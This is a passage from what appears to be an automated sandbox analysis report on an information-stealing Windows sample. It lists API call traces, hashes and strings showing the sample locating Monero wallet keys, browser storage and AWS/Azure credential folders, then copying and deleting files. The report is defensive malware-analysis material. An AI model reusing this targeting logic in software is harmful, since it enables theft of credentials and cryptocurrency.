                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                • String ID: %s%s
                                • API String ID: 2672039231-3252725368
                                • Opcode ID: 9edc4ab344c33dfad473d258bf415c8b56828acdc46b454aa61048d8b12d8e22
                                • Instruction ID: 1e4d1baf95d5d657e1ade41a4324f72018780214df172a7fec1c1ec0f82cfbf2
                                • Opcode Fuzzy Hash: 9edc4ab344c33dfad473d258bf415c8b56828acdc46b454aa61048d8b12d8e22
                                • Instruction Fuzzy Hash: 56F10672901618EFCB10DB74DD48EAAB7BAFB88300F144599E949E7350DF70AE45CBA0
                                Function 006C1F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C1F9F
                                • lstrlen.KERNEL32(00F18A10), ref: 006C1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 006C1FE3
                                • lstrlen.KERNEL32(006F1794), ref: 006C1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C200E
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C204D
                                • lstrlen.KERNEL32(006F1794), ref: 006C2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C2075
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C2081
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C20AC
                                • lstrlen.KERNEL32(?), ref: 006C20E4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C2104
                                • lstrcat.KERNEL32(00000000,?), ref: 006C2112
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C2139
                                • lstrlen.KERNEL32(006F1794), ref: 006C214B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C216B
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006C2177
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C219D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006C21A8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C21D4
                                • lstrlen.KERNEL32(?), ref: 006C21EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C220A
                                • lstrcat.KERNEL32(00000000,?), ref: 006C2218
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C2242
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C227F
                                • lstrlen.KERNEL32(00F1EFF0), ref: 006C228D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C22B1
                                • lstrcat.KERNEL32(00000000,00F1EFF0), ref: 006C22B9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C22F7
                                • lstrcat.KERNEL32(00000000), ref: 006C2304
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C232D
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006C2356
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C2382
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C23BF
                                • DeleteFileA.KERNEL32(00000000), ref: 006C23F7
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006C2444
                                • FindClose.KERNEL32(00000000), ref: 006C2453
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                • String ID:
                                • API String ID: 2857443207-0
                                • Opcode ID: 74c6fe96699640eaea0685292ed80631803627b1d70d6378d9120f3883b2ab8d
                                • Instruction ID: bed1aad86ed9c38e392b8b1fdd48e7ec58ead7af6a347047d686d4ef7c80253e
                                • Opcode Fuzzy Hash: 74c6fe96699640eaea0685292ed80631803627b1d70d6378d9120f3883b2ab8d
                                • Instruction Fuzzy Hash: 6AE11471A1161B9BCB61ABA6D899FBE77AAEF44300F04402CFD09A7211DF34DD45CBA4
                                Function 006D6410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6445
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6480
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006D64AA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D64E1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6506
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D650E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6537
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FolderPathlstrcat
                                • String ID: \..\
                                • API String ID: 2938889746-4220915743
                                • Opcode ID: 7063ca53a4bd4bdf696b9c72e37d7a4debf9c15a8d7c2ec0ac1838efb29239f5
                                • Instruction ID: 8012edc281df3ebe7c0cd60411cc81159a4328a8898858c2c0ca125366b82b91
                                • Opcode Fuzzy Hash: 7063ca53a4bd4bdf696b9c72e37d7a4debf9c15a8d7c2ec0ac1838efb29239f5
                                • Instruction Fuzzy Hash: E3F16870E116069BCB21AF7AD859FBE77A6AF44300F04802EF84AD7351DB38D846CB95
                                Function 006D4370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D43A3
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D43D6
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D43FE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D4409
                                • lstrlen.KERNEL32(\storage\default\), ref: 006D4414
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4431
                                • lstrcat.KERNEL32(00000000,\storage\default\), ref: 006D443D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4466
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D4471
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4498
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D44D7
                                • lstrcat.KERNEL32(00000000,?), ref: 006D44DF
                                • lstrlen.KERNEL32(006F1794), ref: 006D44EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4507
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D4513
                                • lstrlen.KERNEL32(.metadata-v2), ref: 006D451E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D453B
                                • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 006D4547
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D456E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D45A0
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006D45A7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D4601
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D462A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D4653
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D467B
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D46AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                • String ID: .metadata-v2$\storage\default\
                                • API String ID: 1033685851-762053450
                                • Opcode ID: 79fd6d2561a8769e14c155237c7c917eb96e7777ff31312db4d35a532d2dbd06
                                • Instruction ID: b3860e9f2dc3405a1509b79e49e006771343ca258eaa96f2e08809485b575b3b
                                • Opcode Fuzzy Hash: 79fd6d2561a8769e14c155237c7c917eb96e7777ff31312db4d35a532d2dbd06
                                • Instruction Fuzzy Hash: 21B14471A116169BCB21AFBAD959FBE76AAEF44300F04002DF84AE7351DF34ED418B94
                                Function 006D57A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D57D5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006D5804
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D5835
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D585D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D5868
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D5890
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D58C8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D58D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D58F8
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D592E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D5956
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D5961
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D5988
                                • lstrlen.KERNEL32(006F1794), ref: 006D599A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D59B9
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D59C5
                                • lstrlen.KERNEL32(00F1F020), ref: 006D59D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D59F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D5A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D5A2C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D5A58
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006D5A5F
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D5AB7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D5B2D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D5B56
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D5B89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D5BB5
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D5BEF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D5C4C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D5C70
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2428362635-0
                                • Opcode ID: 441d78f11ba7ee55af1dc1d70c16b39f726a0ef24c3ce0b940d8e63ab7abec9f
                                • Instruction ID: d7c7f2a11ffac16a027ef30096b47515ebaed3c1a4cdfae3eb51b6e08868ab20
                                • Opcode Fuzzy Hash: 441d78f11ba7ee55af1dc1d70c16b39f726a0ef24c3ce0b940d8e63ab7abec9f
                                • Instruction Fuzzy Hash: E2027971E11A169BCB21AFA9C899EBE7BB6EF44300F04412EF84A97750DB34DC41CB94
                                Function 006C1190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006C1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C1135
                                  • Part of subcall function 006C1120: RtlAllocateHeap.NTDLL(00000000), ref: 006C113C
                                  • Part of subcall function 006C1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 006C1159
                                  • Part of subcall function 006C1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 006C1173
                                  • Part of subcall function 006C1120: RegCloseKey.ADVAPI32(?), ref: 006C117D
                                • lstrcat.KERNEL32(?,00000000), ref: 006C11C0
                                • lstrlen.KERNEL32(?), ref: 006C11CD
                                • lstrcat.KERNEL32(?,.keys), ref: 006C11E8
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C121F
                                • lstrlen.KERNEL32(00F18A10), ref: 006C122D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1251
                                • lstrcat.KERNEL32(00000000,00F18A10), ref: 006C1259
                                • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 006C1264
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1288
                                • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 006C1294
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C12BA
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C12FF
                                • lstrlen.KERNEL32(00F1EFF0), ref: 006C130E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1335
                                • lstrcat.KERNEL32(00000000,?), ref: 006C133D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1378
                                • lstrcat.KERNEL32(00000000), ref: 006C1385
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C13AC
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 006C13D5
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1401
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C143D
                                  • Part of subcall function 006DEDE0: lstrcpy.KERNEL32(00000000,?), ref: 006DEE12
                                • DeleteFileA.KERNEL32(?), ref: 006C1471
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                • String ID: .keys$\Monero\wallet.keys
                                • API String ID: 2881711868-3586502688
                                • Opcode ID: 1f1e1a4dec89528a17e3a03b04119b7ba285dc1d29cd7f4747157dc0de3549ce
                                • Instruction ID: 2ef195c54b46c30050ea3b7246228d5a1f405f53b5098ac6253bbb53db1ba163
                                • Opcode Fuzzy Hash: 1f1e1a4dec89528a17e3a03b04119b7ba285dc1d29cd7f4747157dc0de3549ce
                                • Instruction Fuzzy Hash: 09A13A71A106069BCB21ABB5DC59FBE77BAEF46310F04402CF949EB252DF34DA418B94
                                Function 006DE720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 006DE740
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006DE769
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE79F
                                • lstrcat.KERNEL32(?,00000000), ref: 006DE7AD
                                • lstrcat.KERNEL32(?,\.azure\), ref: 006DE7C6
                                • memset.MSVCRT ref: 006DE805
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006DE82D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE85F
                                • lstrcat.KERNEL32(?,00000000), ref: 006DE86D
                                • lstrcat.KERNEL32(?,\.aws\), ref: 006DE886
                                • memset.MSVCRT ref: 006DE8C5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006DE8F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DE920
                                • lstrcat.KERNEL32(?,00000000), ref: 006DE92E
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 006DE947
                                • memset.MSVCRT ref: 006DE986
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$memset$FolderPathlstrcpy
                                • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 4067350539-3645552435
                                • Opcode ID: fbf4296076170a2cf98a5e958f4130f0938ade5610daee0655d2339316d2613a
                                • Instruction ID: a0312ef2238ebd8b048cb31fe47258dcb62a40a7369c89c7b4706d3f06945a99
                                • Opcode Fuzzy Hash: fbf4296076170a2cf98a5e958f4130f0938ade5610daee0655d2339316d2613a
                                • Instruction Fuzzy Hash: BF71C471E50219ABDB61EBB4DC46FFD7375EF88700F4104ACBB199B281DE709A848B58
                                Function 006DABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32 ref: 006DABCF
                                • lstrlen.KERNEL32(00F20280), ref: 006DABE5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DAC0D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006DAC18
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DAC41
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DAC84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006DAC8E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DACB7
                                • lstrlen.KERNEL32(006F4AD4), ref: 006DACD1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DACF3
                                • lstrcat.KERNEL32(00000000,006F4AD4), ref: 006DACFF
